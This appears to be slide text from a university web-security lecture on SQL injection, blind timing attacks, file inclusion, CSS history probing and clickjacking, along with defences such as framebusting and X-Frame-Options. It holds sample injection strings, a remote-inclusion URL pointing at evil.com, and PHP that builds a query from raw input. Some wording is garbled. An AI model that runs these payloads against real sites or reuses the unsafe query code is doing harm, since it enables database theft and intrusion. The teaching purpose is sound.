11
“Injection flaws occur when an application sends untrusted data to an interpreter.” --- OWASP 11 https://www.owasp.org/index.php/Top_10_2010-A4-Insecure_Direct_Object_References Like Buffer Overflow and Format String Vulnerabilities, A result of from the possibility of interpreting data as code

33
Probing Number of Columns ORDER BY can be added to an SQL query to order results by a queried column. 33 select first_name,last_name from users where user_id = 1 ORDER BY 1 $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = ‘$id’"; $result = mysql_query($getid) or die(' '. mysql_error(). ' ' );

34
Probing Number of Columns ORDER BY can be added to an SQL query to order results by a column $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’”;... select first_name,last_name from users where user_id = ‘1’ ORDER BY 1;# ✓ select first_name,last_name from users where user_id = ‘1’ ORDER BY 3;# ✗ 1 or 2 columns

35
Probing Number of Columns ORDER BY can be added to an SQL query to order results by a column. 35 What would be a good algorithm using this fact to determine exact number of columns? Binary Search! ✓ Brute force assuming an upper bound of 32 columns => ~ 5 queries

36
Probing Column Names A query with an incorrect column name will give an error $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’”;... select first_name,last_name from users where user_id = ‘1’ or first_name IS NULL;# ✓ select first_name,last_name from users where user_id = ‘1’ or firstname IS NULL;# ✗

40
Blind SQL Injection 40 /user.php?id=5 SELECT FROM users where uid=5 “jburket” Sometimes results of SQL queries are not sent back to the user

41
Blind SQL Injection Defn: A blind SQL injection attack is an attack against a server that responds with generic error page or even nothing at all. Approach: ask a series of True/False questions, exploit side-channels 41

42
Blind SQL Injection 42 if ASCII(SUBSTRING(username,1,1)) = 64 waitfor delay ‘0:0:5’ if ASCII(SUBSTRING(username,1,1)) = 64 waitfor delay ‘0:0:5’ 1 2 If the first letter of the username is A (65), there will be a 5 second delay Actual MySQL syntax!

43
Blind SQL Injection 43 if ASCII(SUBSTRING(username,1,1)) = 65 waitfor delay ‘0:0:5’ 1 2 By timing responses, the attacker learns about the database one bit at a time

90
Remote File Inclusion 90 … … Example from wikipedia.org/File_inclusion_vulnerability colors.php: “/colors.php?COLOR=red” will include contents of red.php “/colors.php?COLOR=blue” will include contents of blue.php “/colors.php?COLOR=/hidden/dangerous” will include /hidden/dangerous.php “/colors.php?COLOR=http://evil.com/bad” will include Perfect for executing an XSS attack Local File Inclusion

94
CSS History Probing 94 Image from evil.com: Client has visited Google, Facebook and the Facebook Group Client has NOT visited Twitter or Facebook Group Attacker uses JavaScript + CSS to check which links are visited

95
How does the “Like” button work? 95 Like button knows about your Facebook session! Appears in “Mashup” with content from other domains

96
How does the “Like” button work? Like Button Requirements: Needs to access cookie for domain facebook.com Can be deployed on domains other than facebook.com Other scripts on the page should not be able to click Like button 96 We need to isolate the Like button from the rest of the page

97
IFrames 97 Parent page Embedded page Any page can be embedded

98
IFrames 98 Pages share same domain Pages do not share same domain The same-origin policy states that the DOM from one domain should not be able to access the DOM from a different domain

99
99 How does the “Like” button work? The same-origin policy prevents the host from clicking the button and from checking if it’s clicked

100
100 The same-origin policy prevents malicious sites from clicking their own “Like” button What if the site can trick you into clicking it yourself?

106
Using Frames for Evil 106 If pages with sensitive buttons can be put in an IFrame, then it may be possible to perform a Clickjacking attack

107
Framebusting 107 Framebusting is a technique where a page stops functioning when included in a frame. if(top != self) top.location.replace(self.location); If the page with this script is embedded in a frame, then it will escape out of the frame and replace the embedding page

111
111 X-Frame-Options Header DENY: The page cannot be embedded in a frame SAMEORIGIN: The page can only be framed on a page with the same domain ALLOW-FROM origin: The page can only be framed on a page with a specific other domain Can limit flexibility and might not work on older browsers

114
114 Disclaimer: The exact details of the following protocols may not be 100% correct (i.e. Facebook might use a slightly different implementation than presented here). Our goal is to get a feel for how these systems work. This section won’t be on the test. Something similar may come up in the homework, however.